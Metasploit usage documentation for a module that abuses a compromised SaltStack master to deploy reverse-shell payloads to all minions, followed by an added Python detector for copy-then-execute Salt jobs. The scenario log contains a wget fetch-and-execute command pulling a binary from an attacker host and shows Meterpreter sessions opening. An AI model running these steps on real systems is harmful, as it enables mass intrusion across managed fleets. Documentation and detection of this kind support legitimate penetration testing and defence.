metasploit-gs/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
2024-01-10 17:09:02 -05:00


Vulnerable Application

This exploit module uses SaltStack Salt to deploy a payload and run it on all selected targets (default: all). It currently only works against *nix targets.

Vulnerable Host

A vulnerable host install can be found in this Docker environment.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Get an initial shell on the box
  4. Do: use exploit/linux/local/saltstack_salt_minion_deployer
  5. Do: set session [#]
  6. Do: run
  7. You should get sessions on all the targeted hosts

Options

SALT

Location of the salt-master executable if it is not in a standard location. This is added to a list of default locations, which includes /usr/bin/salt-master and /usr/local/bin/salt-master. Defaults to `` (empty).

MINIONS

Which minions to target. Defaults to *

WritableDir

A directory on the compromised host we can write our payload to. Defaults to /tmp

TargetWritableDir

A directory on the target hosts that we can write our payload to and execute it from. Defaults to /tmp

CALCULATE

This will calculate how many hosts may be exploitable by using Ansible's ping command.

ListenerTimeout

How many seconds to wait after executing the payload for hosts to call back. If set to 0, wait forever. Defaults to 60

Scenarios

Minion 3002.2 on Ubuntu 20.04

Get initial access to the system. In this case, root was required to execute salt commands successfully.

resource (salt_deploy.rb)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (salt_deploy.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (salt_deploy.rb)> set srvport 8181
srvport => 8181
resource (salt_deploy.rb)> set target 7
target => 7
resource (salt_deploy.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (salt_deploy.rb)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8181/hvy2Ol
[*] Server started.
[*] Run the following command on the target machine:
wget -qO exVJILEV --no-check-certificate http://1.1.1.1:8181/hvy2Ol; chmod +x exVJILEV; ./exVJILEV& disown
[*] 3.3.3.3    web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 3.3.3.3:45200) at 2023-12-16 09:59:02 -0500
resource (salt_deploy.rb)> use exploit/linux/local/saltstack_salt_minion_deployer
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
resource (salt_deploy.rb)> set session 1
session => 1
resource (salt_deploy.rb)> set verbose true
verbose => true
resource (salt_deploy.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (salt_deploy.rb)> set lport 9996
lport => 9996
[msf](Jobs:1 Agents:0) exploit(linux/local/saltstack_salt_minion_deployer) > 

[msf](Jobs:1 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) > 
[*] Started reverse TCP handler on 1.1.1.1:9996 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] /tmp is writable, and salt-master executable found
[+] The target is vulnerable.
[*] Attempting to list minions
[*] minions:
- mac_minion
- salt-minion
- window-salt-minion
minions_denied: []
minions_pre: []
minions_rejected: []
[+] 3.3.3.3:45200 - minion file successfully retrieved and saved to /root/.msf4/loot/20231216100004_default_3.3.3.3_saltstack_minion_890818.yaml
[+] Minions List
============

 Status    Minion Name
 ------    -----------
 Accepted  mac_minion
 Accepted  salt-minion
 Accepted  window-salt-minion

[+] 3 minions were found accepted, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.
[*] Writing '/tmp/E76Azw' (336 bytes) ...
[*] Copying payload to minions

[*] Executing payloads
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9996 -> 2.2.2.2:36850) at 2023-12-16 10:00:46 -0500
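
The sequence in the scenario above (a file copied to the minions, then executed from a writable directory) is also visible from the master's side. The following is an added detection example, not code from the module or the Metasploit project: it correlates master job events and alerts when a cmd.* job runs a file that an earlier job pushed. Assumptions: records follow the shape of Salt's `salt/job/<jid>/new` event data, file pushes appear as `cp.recv` or `cp.recv_chunked`, and all sample events are constructed.

```python
import re
from datetime import datetime

# Assumption: each record mirrors the master's "salt/job/<jid>/new" event data
# (jid, user, tgt, fun, arg, _stamp). File pushes are assumed to show up as
# cp.recv / cp.recv_chunked jobs and execution as cmd.* jobs.
COPY_FUNS = {"cp.recv", "cp.recv_chunked"}
EXEC_FUNS = {"cmd.run", "cmd.run_all", "cmd.shell"}
# Paths under commonly world-writable directories (the page's default is /tmp).
PATH_RE = re.compile(r"(?<![\w./-])(/(?:tmp|var/tmp|dev/shm)/[^\s;&|'\"]+)")

def writable_paths(args):
    """Collect writable-directory paths mentioned in a job's arguments."""
    found = set()
    for arg in args:
        text = " ".join(map(str, arg)) if isinstance(arg, dict) else str(arg)
        found.update(PATH_RE.findall(text))
    return found

def detect_copy_then_exec(events, window_s=300):
    """Alert when a cmd.* job runs a file that an earlier job pushed to minions."""
    pushed, alerts = {}, []  # pushed: path -> (time, jid) of the copy job
    for ev in sorted(events, key=lambda e: e["_stamp"]):
        when = datetime.fromisoformat(ev["_stamp"])
        paths = writable_paths(ev.get("arg", []))
        if ev["fun"] in COPY_FUNS:
            pushed.update({p: (when, ev["jid"]) for p in paths})
        elif ev["fun"] in EXEC_FUNS:
            for p in sorted(paths):
                seen = pushed.get(p)
                if seen and (when - seen[0]).total_seconds() <= window_s:
                    alerts.append({"path": p, "copy_jid": seen[1],
                                   "exec_jid": ev["jid"], "user": ev.get("user"),
                                   "all_minions": ev["tgt"] == "*"})
    return alerts

# Constructed sample events (not taken from the page or from a real master).
SAMPLE_EVENTS = [
    {"jid": "j1", "user": "root", "tgt": "*", "fun": "test.ping", "arg": [],
     "_stamp": "2024-01-01T10:00:01"},
    {"jid": "j2", "user": "root", "tgt": "*", "fun": "cp.recv_chunked",
     "arg": ["/tmp/abc123", "<chunk>", False, None, 493], "_stamp": "2024-01-01T10:00:30"},
    {"jid": "j3", "user": "root", "tgt": "*", "fun": "cmd.run",
     "arg": ["chmod +x /tmp/abc123; /tmp/abc123 &"], "_stamp": "2024-01-01T10:00:41"},
    {"jid": "j4", "user": "ops", "tgt": "web*", "fun": "cmd.run", "arg": ["uptime"],
     "_stamp": "2024-01-01T10:05:00"},
    {"jid": "j5", "user": "ops", "tgt": "db1", "fun": "cmd.run",
     "arg": ["/tmp/report.sh"], "_stamp": "2024-01-01T10:06:00"},
]
```

Jobs j4 and j5 stay quiet because neither runs a file that a prior job delivered; only the j2/j3 pair produces an alert.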